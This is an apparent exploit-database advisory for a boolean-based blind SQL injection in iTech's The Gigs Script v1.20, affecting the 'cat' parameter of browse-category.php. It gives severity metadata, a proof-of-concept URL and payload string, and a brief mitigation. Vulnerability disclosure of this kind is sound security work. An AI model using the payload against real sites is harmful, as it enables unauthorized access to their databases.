vendor:
The Gigs Script
by:
8bitsec
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: The Gigs Script
Affected Version From: 1.20
Affected Version To: 1.20
Patch Exists: YES
Related CWE: N/A
CPE: a:itechscripts:the_gigs_script:1.20
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
iTech Gigs Script v1.20 – SQL Injection
SQL injection on [cat] parameter. Proof of Concept (PoC): SQLi: http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.